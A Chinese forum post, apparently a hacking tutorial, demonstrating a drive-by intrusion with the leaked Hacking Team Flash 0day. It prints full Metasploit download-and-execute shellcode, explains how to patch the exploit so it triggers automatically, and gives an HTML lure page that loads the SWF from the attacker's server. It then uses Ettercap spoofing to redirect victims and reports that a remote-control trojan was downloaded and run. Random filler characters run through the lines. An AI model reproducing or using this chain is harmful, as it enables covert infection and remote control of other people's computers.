flash 0day之手工代码修改制作下载者实例入侵演示

admin · 发表于 2018-10-20 20:28:55

6 [6 r! O. o6 b, ` 三、flash 0day之手工代码修改制作下载者实例入侵演示 ( S- `. e, s7 e4 r

8 f7 |) i' Q6 ?0 b( u 利用到的工具： * [0 ?2 E! o& b( Y" X8 `

$ m. K1 q# D# w6 ~9 T: Y Msf # y+ s M% N' I& E) K, U% o( N

7 B5 ~- m- Q1 n3 x3 _. F, Y Ettercap $ r- v6 x/ j8 l& o( q/ O

. t5 O3 z* B4 Z1 B% g8 J- X Adobe Flash CS6 n5 `6 W, C0 m. ~7 c4 [- y. r

% ~3 N. x/ U' K4 O" [ Hacking Team Flash 0day-可冲破Chrome沙盒-Evil0X源代码一份 6 n* b O* a- i E

$ U/ }1 z7 d1 G; p; X! m3 M* \, f 下面我们就开始演示入侵，利用msf生成shellcode,首先打开msf执行use windows/download_exec，show options ) _2 z1 {7 g5 }) n! p3 q2 _

, `( } U& t$ s- m, C" D 如图： : S, \6 p/ z% S% P; R

1 u! f2 e9 D d! v5 N" R $ n9 V7 l* f' r8 o" z7 j, B

+ e3 p: I% H. W . ^8 O5 I' Y! y/ b- h+ l

& m) Z8 I) \' I' X8 b# H 然后set EXE system.exe,再执行set URL,需要说明一下URL就是我们的马的下载地址，这里我们用远控马，远控配置使用不再详细说明。。。如图: & h3 Y% N- c/ C

8 Z' T+ T) A2 b2 I7 n8 w 7 g( Q+ F7 L4 ?

8 ?. v& R, P- i , ~( R0 o) C7 W. G M

& b! k2 O5 t4 }# [( T7 D- p5 t c 然后执行generate -t dword生成shellcode，如下： ( k% n. ]9 x7 G, n+ u

; U. V2 U# v' G* s% }* A5 v / P k; ~- n1 C! C4 K6 ?) v

$ P8 Z, S- ^2 } 复制代码到文本下便于我们一会编辑flash exp，如下： . X* a. j/ G$ h6 q; O# Y( Y: a( b

% V( e6 L2 Y7 s0 D* A: v3 z* | 0x0089e8fc, 0x89600000, 0x64d231e5, 0x8b30528b, 0x528b0c52, 0x28728b14, 0x264ab70f, 0xc031ff31, # N# }' ^8 Y/ \$ R% t9 T

2 b$ w T7 w3 T. ^4 X$ y 0x7c613cac, 0xc1202c02, 0xc7010dcf, 0x5752f0e2, 0x8b10528b, 0xd0013c42, 0x8578408b, 0x014a74c0, / Z6 g, \- y. ] N7 }3 G T& d

1 m+ l4 q( e6 k! |4 W( Y R 0x488b50d0, 0x20588b18, 0x3ce3d301, 0x8b348b49, 0xff31d601, 0xc1acc031, 0xc7010dcf, 0xf475e038, ( I6 ~- M' n7 V: q7 M

8 z; }$ i8 f9 y: {7 {0 u9 u& @* _ 0x3bf87d03, 0xe275247d, 0x24588b58, 0x8b66d301, 0x588b4b0c, 0x8bd3011c, 0xd0018b04, 0x24244489, ! Y0 ]% j/ l' l2 X% h0 }

$ c* z& u6 M, u0 }; R 0x59615b5b, 0xe0ff515a, 0x8b5a5f58, 0x5d86eb12, 0x74656e68, 0x69776800, 0xe689696e, 0x774c6854, 0 F, D1 a3 h( x. Y) H* y, J$ U# f: w

) C& g' ^! V: M, z 0xd5ff0726, 0x5757ff31, 0x68565757, 0xa779563a, 0x60ebd5ff, 0x51c9315b, 0x51036a51, 0x53506a51, 6 }# Y. k3 J9 U' B+ _$ {

" K& b, u2 A# P% W( l. s 0x89576850, 0xd5ffc69f, 0x31594feb, 0x006852d2, 0x52846032, 0x52515252, 0x55eb6850, 0xd5ff3b2e, 4 e- N) v \$ K

2 ]5 M7 a, F$ ^$ Y 0x106ac689, 0x3380685b, 0xe0890000, 0x6a50046a, 0x7568561f, 0xff869e46, 0x57ff31d5, 0x56575757, - p5 C" s$ W I5 q" f5 |) q

2 ]" m9 r3 V) X6 B! e+ U 0x18062d68, 0x85d5ff7b, 0x4b1f75c0, 0x007c840f, 0xd1eb0000, 0x00008ee9, 0xfface800, 0x732fffff, 9 I: b* y* d& ]; C

$ u8 l+ t+ A# J' |& L6 M" \8 V 0x65747379, 0x78652e6d, 0x6beb0065, 0x505fc031, 0x026a026a, 0x6a026a50, 0xda685702, 0xff4fdaf6, * ?6 [. k7 a' A" u* U. q

! g( c9 b2 T+ J, M% r. s 0xc03193d5, 0x0304b866, 0x8d54c429, 0x3108244c, 0x5003b4c0, 0x12685651, 0xffe28996, 0x74c085d5, % P1 y& q. _/ @6 U/ ~& V

; \* T+ J' Q$ \- [+ E9 Y 0xc085582d, 0x006a1674, 0x448d5054, 0x53500c24, 0xae572d68, 0x83d5ff5b, 0xceeb04ec, 0x96c66853, * H; j- o8 m1 u0 H

|3 d6 C, d3 z |( e5 ], x) j 0xd5ff5287, 0x6857006a, 0x876f8b31, 0x006ad5ff, 0xa2b5f068, 0xe8d5ff56, 0xffffff90, 0x74737973, $ \4 K3 T( C; \ ^9 B, H

1 j/ a5 v/ v) E4 g 0x652e6d65, 0xe8006578, 0xffffff08, 0x2e737378, 0x64696162, 0x6b682e6f, 0x00000000 1 i6 R: Y8 }4 @# |- R6 e

0 u1 S- s$ p' q; Y * \* X# ~5 T/ m- ?

8 X0 h- Y4 V! J: l+ F6 | & U. j* U& B9 Z

- P1 G5 ]$ T4 M 下面我们来修改flash 0day exp，需要修改三个文件，分别为： . `) p# d( M( k( B- e2 S0 t

+ ]1 W3 N& a' ]6 |( E - K2 B# i* [& s/ t9 j4 U' X% f

! L2 A( |) z1 |( {0 f* | 先修改ShellWin32.as，部分源代码如图： ! r' p1 a K/ c, T7 q

8 g. U. f: H, o5 r 1 w& X. c4 u3 j Z, g/ b5 k& O; x+ ^

0 t8 }! R& A9 g) D6 ^& @! H 我们需要把标记处[]中的代码改成用msf生成的代码，修改后如下： , F; `# ~2 J( _! W4 n% t

- [2 P+ p3 Q+ H F: r / O6 F; |& W l2 w

! j2 R1 k/ s; t 然后保存，ShellWin64.as的修改方法如上述，不再演示，下面我们来修改myclass.as,这里需要说明一下，因为此exp生成的利用程序，不能直接自动触发flash漏洞，也就是需要点击按钮才可以，实际上在做渗透的时候需要把它搞得更完美，所以就需要修改，修改方法：搜索myclass的某个字符doc.addchild(btn);如图： 1 e2 X r) B/ Y$ d& S. N1 F2 _

5 L* @, p" X1 O4 y ' N5 E4 h F" G

$ B/ {/ _$ A% J: P. t 换行在后面加一句TryExpl();注意是l不是数字1，然后如图： ( c+ A' p3 b" O o! n

) f% a6 U) ~" T3 o5 U& Z 4 u* q- A2 r0 r$ e$ z

3 x5 k( B( g+ ?) c% p6 u " l E: G! v" s" l1 L

% `# X8 o: n2 ?' S : D6 Q6 e5 C! K5 }; q' u2 q

; a9 t& x7 R7 z9 x- l- ] 然后点保存，下面我们来编译一下，打开 0 C% d8 L$ h! y

3 C% i5 I0 J! @* g exp1.fla然后点文件-发布，看看编译没错误 $ _/ A! Z4 W6 J6 r3 Y8 V1 g

& o+ b3 k; s! W9 ]0 j1 j, k . V9 N+ t# V% B1 f: m/ O u

9 r3 W7 t- N: n5 X7 X 9 J7 g0 V i& a

- {+ [! c2 E( j: ?# M2 x - r+ B9 |9 e' H- ^9 O5 t

, s+ M; Z) x+ T, z$ r. V 8 U1 k* p- h: j, t) i3 M, v1 J

# a$ ], W- A" ~8 F5 b 然后我们把生成的 1 l; x0 L% c& W! M2 M

8 j1 {* Q( s, `: g a exp1.swf丢到kailinux 的/var/www/html下： + d8 u1 }, C% X! d: W

& o2 Z4 ]* k$ M* w+ A 然后把这段代码好好编辑一下 ; {9 j. B3 Q' P* W4 k$ H

v$ C! F2 l( n: q- T& l; {6 T- n8 h # a. \1 s/ t, ?; l O

: \# ]+ p0 N+ u$ W7 [: Y. D 2 V J2 k. D; J0 ?

9 L: G/ i9 }- L) l* i ( A O8 I2 Y; m

* y0 Q6 K" K* j: Y% D$ E 0 v5 @4 e) s( \& Z' K' r' t8 p1 ], u

0 n0 S) D6 J2 _8 ]+ z ; {+ i, g9 U+ U9 q& C$ n

# B4 P; |% F( I9 I8 i9 c+ t" G / S6 ~; u5 L- ^3 N$ [

' B6 z; z& Y8 K" c4 N; z8 T6 e <!DOCTYPE html> / u; f, p; p% W: T$ S9 {

# p7 W1 a* h2 E! \ <html> 8 e2 e1 N; y3 r x9 T4 c& q

# F% F4 W& I6 J; ]6 p <head> 1 y/ Q; f( Q! `, F% t& a

; g) a) H7 t0 x! F0 g5 A# { <meta http-equiv="Content-Type" content="text/html; ; H$ @" p& U" f9 t

7 {+ H6 k, l. f" l& I charset=utf-8"/> H6 C: y9 V% c4 j7 m

9 U1 ]- u3 ^. `* Z </head> 5 [2 N( w D6 G

9 ~8 N* R$ n+ B+ R& o; X( W5 q <body> 3 ~6 z, O. Q: k. t6 f' n& s+ \

% P6 v: c: ?$ B: Q4 G2 d8 }2 Z: { <h2> Please wait, the requested page is loading...</h2> & o5 Z1 y M9 E

( J. x1 w- s' A9 Z( L <br> 4 t g) S- d* J6 e; [

0 A- x( z" I/ X" o( Z <OBJECT ) A2 r `/ H9 Q* w$ A

2 a$ B' } w6 C) `" `; d/ s8 o4 ` classid="clsid27CDB6E-AE6D-11cf-96B8-444553540000" WIDTH="50" HEIGHT="50" id="4"><ARAM NAME=movie " P7 {( f$ M% i' k5 V& ?: G4 s

n' v: l2 N7 j VALUE="http://192.168.0.109/exp1.swf"></OBJECT> + l: L: Z% \. w) a) q( S

( e" j3 C/ Q7 d& B6 Y; _ </body> ; m+ R( N' s& Y/ B

5 d# x9 B; H6 K" `* u <script> 3 O3 V: Y; z5 l" T3 a

- R( Q( g2 [- Y+ ^% N9 p setTimeout(function () { S3 c& c% X y: \3 f. r d

- o# s+ v" T- O8 U ) H8 o' b+ |/ Y5 C( Y/ L; z

- U' @2 S" S @6 v window.location.reload(); " j& h9 l. k+ a% Z

' k+ L Z E2 k6 Y K8 g) R1 I }, 10000); - q) e' f% q" m {/ X* a. @/ X

4 s% r. f, t$ h1 Q$ B ! |: { \1 r6 W+ ]

; F! T7 W' i+ u W4 S* V ^ </script> / Z# a/ z! ~4 n, B, c3 m( t" a

+ V! m/ q9 d6 m% \) L </html> 0 e1 J$ N1 ]0 G1 m: o. i" i! s

0 W) i' e0 M" M) p ) E7 c, M8 ]- L2 y/ S

$ |$ H1 B% M: S8 f) {0 h 注意：192.168.0.109是kali的ip地址，这时候我们需要service apache2 start启动一下web服务，然后将上面的html保存为index.htm同样丢到kali web目录下，测试访问链接存在如图： & L9 x, A+ \5 s( }1 v

5 Y6 Y2 j3 q+ y ) D3 A) h1 m/ M2 [

9 z+ E6 Q* x+ S8 j- v* ]& n 8 X! I! k$ i% k

. W/ @2 O2 A# U/ t) t ! t$ h+ O6 |% ]2 W( d/ ]9 _5 W* ^

/ J0 \$ l/ ~3 D 5 j% Y) j6 Y% c e- Y9 ~

3 w0 o; l5 F4 W; s6 U1 I: v0 Z0 R3 D % D( k* j7 ~5 n

6 j9 ~% K, S% ?: {+ s2 P: }5 _ 下面我们用ettercap欺骗如图： & i+ v/ }- y( j! P

2 j' T/ {% `' g9 L) }3 ~9 ` , L7 K4 [) F% A2 F2 r

6 h/ v& q5 Z$ H) H, T$ Q) P! p - \" l& ]6 T; K* T1 H% }

) P) O0 P0 F+ @ 下面我们随便访问个网站看看： " @: k' B' d5 ?/ ?0 P

! E5 i, K2 N3 M0 `/ L* B 我靠我发现直接用ettercap欺骗物理机装了腾讯管家照样可以欺骗成功，如图： 1 S& ~. D, B+ ~

8 w9 T* q. G- U: A& P , v. h7 U; x7 C* J" Y

5 e( ?$ ^; \# B8 I% Y- S- K 我们看另一台， 4 a: l( n* j0 p* U7 _+ v) j, j

5 C+ |- S/ X+ t" ?1 t 提示这个错误，说明木马是成功被下载执行了，只是由于某些原因没上线而已。。。 * }, ?1 B7 n! R U3 D

		自动登录	找回密码
密码			立即注册